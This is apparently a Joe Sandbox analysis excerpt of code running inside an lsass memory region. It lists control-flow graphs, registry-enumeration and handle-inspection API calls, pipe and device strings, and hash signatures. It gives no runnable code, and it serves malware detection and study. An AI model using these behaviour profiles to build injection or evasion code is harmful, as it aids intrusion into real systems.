17d2dd51ad3 16295->16296 16296->16295 16297 17d2dd515a0 StrCmpIW StrCmpW 16296->16297 16297->16296 16299 17d2dd51650 __std_exception_copy 16298->16299 16343 17d2dd51268 GetProcessHeap 16299->16343 16301 17d2dd51658 16302 17d2dd51268 2 API calls 16301->16302 16303 17d2dd51669 16302->16303 16304 17d2dd51268 2 API calls 16303->16304 16305 17d2dd51672 16304->16305 16306 17d2dd51268 2 API calls 16305->16306 16307 17d2dd5167b 16306->16307 16308 17d2dd51696 RegOpenKeyExW 16307->16308 16309 17d2dd518ae 16308->16309 16310 17d2dd516c8 RegOpenKeyExW 16308->16310 16309->16296 16311 17d2dd516f1 16310->16311 16312 17d2dd51707 RegOpenKeyExW 16310->16312 16347 17d2dd512bc RegQueryInfoKeyW 16311->16347 16314 17d2dd51742 RegOpenKeyExW 16312->16314 16315 17d2dd5172b 16312->16315 16318 17d2dd5177d RegOpenKeyExW 16314->16318 16319 17d2dd51766 16314->16319 16358 17d2dd5104c RegQueryInfoKeyW 16315->16358 16320 17d2dd517a1 16318->16320 16321 17d2dd517b8 RegOpenKeyExW 16318->16321 16323 17d2dd512bc 13 API calls 16319->16323 16324 17d2dd512bc 13 API calls 16320->16324 16325 17d2dd517f3 RegOpenKeyExW 16321->16325 16326 17d2dd517dc 16321->16326 16327 17d2dd51773 RegCloseKey 16323->16327 16328 17d2dd517ae RegCloseKey 16324->16328 16330 17d2dd5182e RegOpenKeyExW 16325->16330 16331 17d2dd51817 16325->16331 16329 17d2dd512bc 13 API calls 16326->16329 16327->16318 16328->16321 16332 17d2dd517e9 RegCloseKey 16329->16332 16334 17d2dd51852 16330->16334 16335 17d2dd51869 RegOpenKeyExW 16330->16335 16333 17d2dd5104c 5 API calls 16331->16333 16332->16325 16338 17d2dd51824 RegCloseKey 16333->16338 16339 17d2dd5104c 5 API calls 16334->16339 16336 17d2dd518a4 RegCloseKey 16335->16336 16337 17d2dd5188d 16335->16337 16336->16309 16340 17d2dd5104c 5 API calls 16337->16340 16338->16330 16341 17d2dd5185f RegCloseKey 16339->16341 16342 17d2dd5189a RegCloseKey 16340->16342 16341->16335 16342->16336 16364 17d2dd66168 16343->16364 16345 17d2dd51283 GetProcessHeap 16346 17d2dd512ae __std_exception_copy 16345->16346 16346->16301 16348 17d2dd5148a RegCloseKey 16347->16348 16349 17d2dd51327 GetProcessHeap 16347->16349 16348->16312 16350 17d2dd5133e __std_exception_copy 16349->16350 16351 17d2dd51352 RegEnumValueW 16350->16351 16352 17d2dd51476 GetProcessHeap HeapFree 16350->16352 16353 17d2dd51534 2 API calls 16350->16353 16354 17d2dd513d3 GetProcessHeap 16350->16354 16355 17d2dd5141e lstrlenW GetProcessHeap 16350->16355 16356 17d2dd51443 StrCpyW 16350->16356 16357 17d2dd513f3 GetProcessHeap HeapFree 16350->16357 16351->16350 16352->16348 16353->16350 16354->16350 16355->16350 16356->16350 16357->16355 16359 17d2dd511b5 RegCloseKey 16358->16359 16362 17d2dd510bf __std_exception_copy 16358->16362 16359->16314 16360 17d2dd510cf RegEnumValueW 16360->16362 16361 17d2dd5114e GetProcessHeap 16361->16362 16362->16359 16362->16360 16362->16361 16363 17d2dd5116e GetProcessHeap HeapFree 16362->16363 16363->16362 16365 17d2dd66177 16364->16365

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 0000017D2DD52544 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 5 17d2dd52544-17d2dd525c8 call 17d2dd72d30 8 17d2dd525ce-17d2dd525d1 5->8 9 17d2dd527ec-17d2dd5280f 5->9 8->9 10 17d2dd525d7-17d2dd525e5 8->10 10->9 11 17d2dd525eb-17d2dd52631 call 17d2dd65730 * 3 GetFileType 10->11 18 17d2dd52633-17d2dd52647 StrCpyW 11->18 19 17d2dd52649-17d2dd52653 call 17d2dd51a48 11->19 20 17d2dd52658-17d2dd5265c 18->20 19->20 22 17d2dd52662-17d2dd52667 20->22 23 17d2dd52749-17d2dd52762 call 17d2dd530bc call 17d2dd53858 20->23 25 17d2dd5266a-17d2dd5266f 22->25 36 17d2dd52764-17d2dd52793 call 17d2dd530bc call 17d2dd53058 call 17d2dd51cb4 23->36 37 17d2dd526f9-17d2dd52743 call 17d2dd72d30 23->37 27 17d2dd52671-17d2dd52674 25->27 28 17d2dd5268c 25->28 27->28 31 17d2dd52676-17d2dd52679 27->31 29 17d2dd5268f-17d2dd526a8 call 17d2dd530bc call 17d2dd53858 28->29 46 17d2dd526ae-17d2dd526dd call 17d2dd530bc call 17d2dd53058 call 17d2dd51cb4 29->46 47 17d2dd5279b-17d2dd5279d 29->47 31->28 34 17d2dd5267b-17d2dd5267e 31->34 34->28 38 17d2dd52680-17d2dd52683 34->38 36->37 63 17d2dd52799 36->63 37->9 37->23 38->28 42 17d2dd52685-17d2dd5268a 38->42 42->28 42->29 46->47 69 17d2dd526e3-17d2dd526ee 46->69 49 17d2dd527be-17d2dd527c1 47->49 50 17d2dd5279f-17d2dd527b9 47->50 53 17d2dd527c3-17d2dd527c9 49->53 54 17d2dd527cb-17d2dd527ce 49->54 50->25 53->9 57 17d2dd527d0-17d2dd527d3 54->57 58 17d2dd527e9 54->58 57->58 61 17d2dd527d5-17d2dd527d8 57->61 58->9 61->58 64 17d2dd527da-17d2dd527dd 61->64 63->9 64->58 66 17d2dd527df-17d2dd527e2 64->66 66->58 68 17d2dd527e4-17d2dd527e7 66->68 68->9 68->58 69->25 70 17d2dd526f4 69->70 70->9
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction ID: be60497f1b3bb757eb9c40a55f823d933b164f7bed1d5150bfb2534825b154ea
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F271E836208F8A82EB34DF35BC543EA6BB4FB44794F494016DD4D4378ADEB5C58A8740
                                                                                                                                                                                                                                                Function 0000017D2DD52034 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 162COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 89 17d2dd52034-17d2dd5205f call 17d2dd72d70 91 17d2dd52065-17d2dd5206e 89->91 92 17d2dd52070-17d2dd52074 91->92 93 17d2dd52077-17d2dd5207a 91->93 92->93 94 17d2dd52080-17d2dd52083 93->94 95 17d2dd5222b-17d2dd5224b 93->95 96 17d2dd52089-17d2dd5209b 94->96 97 17d2dd5217b-17d2dd5217e 94->97 96->95 98 17d2dd520a1-17d2dd520ad 96->98 99 17d2dd52180-17d2dd5219a call 17d2dd52f18 97->99 100 17d2dd521ef-17d2dd521f2 97->100 102 17d2dd520af-17d2dd520bf 98->102 103 17d2dd520db-17d2dd520e6 call 17d2dd51bc4 98->103 99->95 109 17d2dd521a0-17d2dd521b6 99->109 100->95 104 17d2dd521f4-17d2dd52207 call 17d2dd52f18 100->104 102->103 106 17d2dd520c1-17d2dd520d9 StrCmpNIW 102->106 110 17d2dd52107-17d2dd52119 103->110 117 17d2dd520e8-17d2dd52100 call 17d2dd51bfc 103->117 104->95 116 17d2dd52209-17d2dd52211 104->116 106->103 106->110 109->95 115 17d2dd521b8-17d2dd521d4 109->115 113 17d2dd52129-17d2dd5212b 110->113 114 17d2dd5211b-17d2dd5211d 110->114 120 17d2dd52132 113->120 121 17d2dd5212d-17d2dd52130 113->121 118 17d2dd52124-17d2dd52127 114->118 119 17d2dd5211f-17d2dd52122 114->119 122 17d2dd521d8-17d2dd521eb 115->122 116->95 123 17d2dd52213-17d2dd5221b 116->123 117->110 131 17d2dd52102-17d2dd52105 117->131 125 17d2dd52135-17d2dd52138 118->125 119->125 120->125 121->125 122->122 126 17d2dd521ed 122->126 127 17d2dd5221e-17d2dd52229 123->127 129 17d2dd5213a-17d2dd52140 125->129 130 17d2dd52146-17d2dd52149 125->130 126->95 127->95 127->127 129->98 129->130 130->95 132 17d2dd5214f-17d2dd52153 130->132 131->125 133 17d2dd5216a-17d2dd52176 132->133 134 17d2dd52155-17d2dd52158 132->134 133->95 134->95 135 17d2dd5215e-17d2dd52163 134->135 135->132 136 17d2dd52165 135->136 136->95
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID: S
                                                                                                                                                                                                                                                • API String ID: 756756679-543223747
                                                                                                                                                                                                                                                • Opcode ID: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
                                                                                                                                                                                                                                                • Instruction ID: e6d9cf65a4925b5213f365f011728b373076181cb707664ce8a93ec19c3e99b5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA519E36A15F2886E761CB25F840BEA6BB4FB14784F89C415DF0D52B86DB75C89BC340
                                                                                                                                                                                                                                                Function 0000017D2DD51A48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: eb8ddd73c4e15f21de66f0e3dee770b919fdf917898f85856a439deb2b5aeb72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F0A432308B8892E7308F61F4947996770FB54B88F8C4020CA4D42556DF7CC6CACB80
                                                                                                                                                                                                                                                Function 0000017D2DD532A0 Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1683269324-0
                                                                                                                                                                                                                                                • Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction ID: bd096dc74ed7da0d1c9fed95bed7b3375edca248b29cd9ab8204d1ef912baf82
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43118070B1CF8D83F7649B60B8093D966B4AF54745F0C8069A98E851A3EFB8C0C7C280
                                                                                                                                                                                                                                                Function 0000017D2DD51AC4 Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: GetProcessHeap.KERNEL32 ref: 0000017D2DD5163B
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: HeapAlloc.KERNEL32 ref: 0000017D2DD5164A
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD516BA
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD516E7
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD51701
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51721
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD5173C
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5175C
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD51777
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51797
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD517B2
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD517D2
                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 0000017D2DD51ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 0000017D2DD51AE5
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD517ED
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD5180D
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD51828
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51848
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD51863
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD51883
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD5189E
                                                                                                                                                                                                                                                  • Part of subcall function 0000017D2DD51630: RegCloseKey.ADVAPI32 ref: 0000017D2DD518A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0
                                                                                                                                                                                                                                                • Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction ID: 570d7ab51c8e0b07d291cac90dfff41aaf335325977e64992ebdfe4135924a30
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB31D675219F0982FF50AB22F9413E933B4AF85BC0F1C58219E0E876D7EEA4D8D38251
                                                                                                                                                                                                                                                Function 0000017D2DD22750 Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 176 17d2dd22750-17d2dd227b8 call 17d2dd229e8 * 4 185 17d2dd227be-17d2dd227c1 176->185 186 17d2dd229c6 176->186 185->186 188 17d2dd227c7-17d2dd227ca 185->188 187 17d2dd229c8-17d2dd229e4 186->187 188->186 189 17d2dd227d0-17d2dd227d3 188->189 189->186 190 17d2dd227d9-17d2dd227fa 189->190 190->186 192 17d2dd22800-17d2dd22820 190->192 193 17d2dd22822-17d2dd2284a 192->193 194 17d2dd2284c-17d2dd22853 192->194 193->193 193->194 195 17d2dd228f3-17d2dd228fa 194->195 196 17d2dd22859-17d2dd22866 194->196 197 17d2dd22900-17d2dd22915 195->197 198 17d2dd229a6-17d2dd229c4 195->198 196->195 199 17d2dd2286c-17d2dd2287e LoadLibraryA 196->199 197->198 200 17d2dd2291b 197->200 198->187 201 17d2dd22880-17d2dd2288c 199->201 202 17d2dd228de-17d2dd228e6 199->202 205 17d2dd22921-17d2dd22935 200->205 206 17d2dd228d9-17d2dd228dc 201->206 202->199 203 17d2dd228e8-17d2dd228ed 202->203 203->195 207 17d2dd22937-17d2dd22948 205->207 208 17d2dd22996-17d2dd229a0 205->208 206->202 209 17d2dd2288e-17d2dd22891 206->209 211 17d2dd22953-17d2dd22957 207->211 212 17d2dd2294a-17d2dd22951 207->212 208->198 208->205 213 17d2dd22893-17d2dd228b9 209->213 214 17d2dd228bb-17d2dd228cb 209->214 216 17d2dd22961-17d2dd22965 211->216 217 17d2dd22959-17d2dd2295f 211->217 215 17d2dd22984-17d2dd22994 212->215 218 17d2dd228ce-17d2dd228d5 213->218 214->218 215->207 215->208 219 17d2dd22977-17d2dd2297b 216->219 220 17d2dd22967-17d2dd22975 216->220 217->215 218->206 219->215 222 17d2dd2297d-17d2dd22980 219->222 220->215 222->215
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2672695610.0000017D2DD20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD20000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd20000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction ID: 39426c26ca32ae400772b24e4e950172d55683279c8d6bef7303a10b684e0d04
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D61F232B09B9487DB548F15A4447ADBBB2FB44BA4F5C8121AE1D0778FDA38D893C710

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 0000017D2DD52B40 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 405 17d2dd52b40-17d2dd52bb9 call 17d2dd72d50 408 17d2dd52ef4-17d2dd52f17 405->408 409 17d2dd52bbf-17d2dd52bc5 405->409 409->408 410 17d2dd52bcb-17d2dd52bce 409->410 410->408 411 17d2dd52bd4-17d2dd52bd7 410->411 411->408 412 17d2dd52bdd-17d2dd52bed GetModuleHandleA 411->412 413 17d2dd52c01 412->413 414 17d2dd52bef-17d2dd52bff call 17d2dd66090 412->414 415 17d2dd52c04-17d2dd52c22 413->415 414->415 415->408 419 17d2dd52c28-17d2dd52c47 StrCmpNIW 415->419 419->408 420 17d2dd52c4d-17d2dd52c51 419->420 420->408 421 17d2dd52c57-17d2dd52c61 420->421 421->408 422 17d2dd52c67-17d2dd52c6e 421->422 422->408 423 17d2dd52c74-17d2dd52c87 422->423 424 17d2dd52c89-17d2dd52c95 423->424 425 17d2dd52c97 423->425 426 17d2dd52c9a-17d2dd52c9e 424->426 425->426 427 17d2dd52cae 426->427 428 17d2dd52ca0-17d2dd52cac 426->428 429 17d2dd52cb1-17d2dd52cbb 427->429 428->429 430 17d2dd52db1-17d2dd52db5 429->430 431 17d2dd52cc1-17d2dd52cc4 429->431 434 17d2dd52dbb-17d2dd52dbe 430->434 435 17d2dd52ee6-17d2dd52eee 430->435 432 17d2dd52cd6-17d2dd52ce0 431->432 433 17d2dd52cc6-17d2dd52cd3 call 17d2dd519a4 431->433 437 17d2dd52ce2-17d2dd52cef 432->437 438 17d2dd52d14-17d2dd52d1e 432->438 433->432 439 17d2dd52dc0-17d2dd52dcc call 17d2dd519a4 434->439 440 17d2dd52dcf-17d2dd52dd9 434->440 435->408 435->423 437->438 444 17d2dd52cf1-17d2dd52cfe 437->444 445 17d2dd52d4e-17d2dd52d51 438->445 446 17d2dd52d20-17d2dd52d2d 438->446 439->440 441 17d2dd52e09-17d2dd52e0c 440->441 442 17d2dd52ddb-17d2dd52de8 440->442 449 17d2dd52e0e-17d2dd52e17 call 17d2dd51bc4 441->449 450 17d2dd52e19-17d2dd52e26 lstrlenW 441->450 442->441 448 17d2dd52dea-17d2dd52df7 442->448 451 17d2dd52d01-17d2dd52d07 444->451 453 17d2dd52d53-17d2dd52d5d call 17d2dd51bc4 445->453 454 17d2dd52d5f-17d2dd52d6c lstrlenW 445->454 446->445 452 17d2dd52d2f-17d2dd52d3c 446->452 456 17d2dd52dfa-17d2dd52e00 448->456 449->450 468 17d2dd52e5e-17d2dd52e69 449->468 462 17d2dd52e49-17d2dd52e53 call 17d2dd53858 450->462 463 17d2dd52e28-17d2dd52e32 450->463 460 17d2dd52d0d-17d2dd52d12 451->460 461 17d2dd52da7-17d2dd52dac 451->461 464 17d2dd52d3f-17d2dd52d45 452->464 453->454 453->461 457 17d2dd52d6e-17d2dd52d78 454->457 458 17d2dd52d8f-17d2dd52da1 call 17d2dd53858 454->458 467 17d2dd52e02-17d2dd52e07 456->467 456->468 457->458 469 17d2dd52d7a-17d2dd52d8d call 17d2dd51534 457->469 458->461 472 17d2dd52e56-17d2dd52e58 458->472 460->438 460->451 461->472 462->472 463->462 473 17d2dd52e34-17d2dd52e47 call 17d2dd51534 463->473 464->461 474 17d2dd52d47-17d2dd52d4c 464->474 467->441 467->456 476 17d2dd52ee0-17d2dd52ee4 468->476 477 17d2dd52e6b-17d2dd52e6f 468->477 469->458 469->461 472->435 472->468 473->462 473->468 474->445 474->464 476->435 482 17d2dd52e71-17d2dd52e75 477->482 483 17d2dd52e77-17d2dd52e91 call 17d2dd65090 477->483 482->483 486 17d2dd52e94-17d2dd52e97 482->486 483->486 489 17d2dd52eba-17d2dd52ebd 486->489 490 17d2dd52e99-17d2dd52eb7 call 17d2dd65090 486->490 489->476 492 17d2dd52ebf-17d2dd52edd call 17d2dd65090 489->492 490->489 492->476
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 2119608203-3850299575
                                                                                                                                                                                                                                                • Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction ID: a0a6aa28ae3149062d712f56b3cd3c4fcddfc72a84a4e799f10804a490fe61e5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBB1A032219F9882EB588F65E4407E96BB4FF44B84F189016DE0D53B96DBB4CCDAC380
                                                                                                                                                                                                                                                Function 0000017D2DD57D90 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: ea04d6ab5b21933593bc799dab6d6a7fa590fe32e1eb952a32cd0718e30f53ac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79311A76208F849AEB609F60F8407ED7374FB88744F58402ADA4E47B96EF78C5898750
                                                                                                                                                                                                                                                Function 0000017D2DD5D814 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000009.00000002.2673042153.0000017D2DD50000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: 835dc39f46adda6f5433ca3369647d18550c7ca659d1a6783716b3d5dcb44e9b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE312C36218F8496EB608F25F8407DE73B4FB89754F580116EA9D43B9ADF38C596CB40
                                                                                                                                                                                                                                                Function 0000017D2DD51630 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

